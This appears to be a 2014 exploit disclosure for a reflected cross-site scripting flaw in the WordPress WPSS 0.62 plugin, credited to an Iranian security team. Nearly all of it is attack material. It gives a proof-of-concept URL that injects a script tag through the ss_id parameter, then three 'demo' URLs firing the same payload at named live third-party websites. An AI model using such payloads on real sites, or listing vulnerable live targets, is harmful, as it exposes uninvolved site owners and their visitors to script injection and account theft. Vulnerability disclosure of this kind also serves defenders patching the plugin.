WordPress WPSS plugin version 0.62 suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
573d18117c642a6f633f17a29834ae59e01c18f4fef919461a88f1e167dbd769
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: Wordpress WPSS v 0.62 Plugin Cross site scripting
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : 2014-08-05
|
| [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
|
| [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
|
| [*] Version : 0.62
|
| [*] Tested on: Windows , Mozila Firefox
|-------------------------------------------------------------------------|
| [*] PoC :
|
| [*]
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
|
|-------------------------------------------------------------------------|
| [*] Demo:
|
| [*]
http://www.tahoebusinesses.com//wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
|
| [*]
http://www.forzabykemp.com/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
|
| [*]
http://calgarysalesteam.com/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
|
|-------------------------------------------------------------------------|
| [*]Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|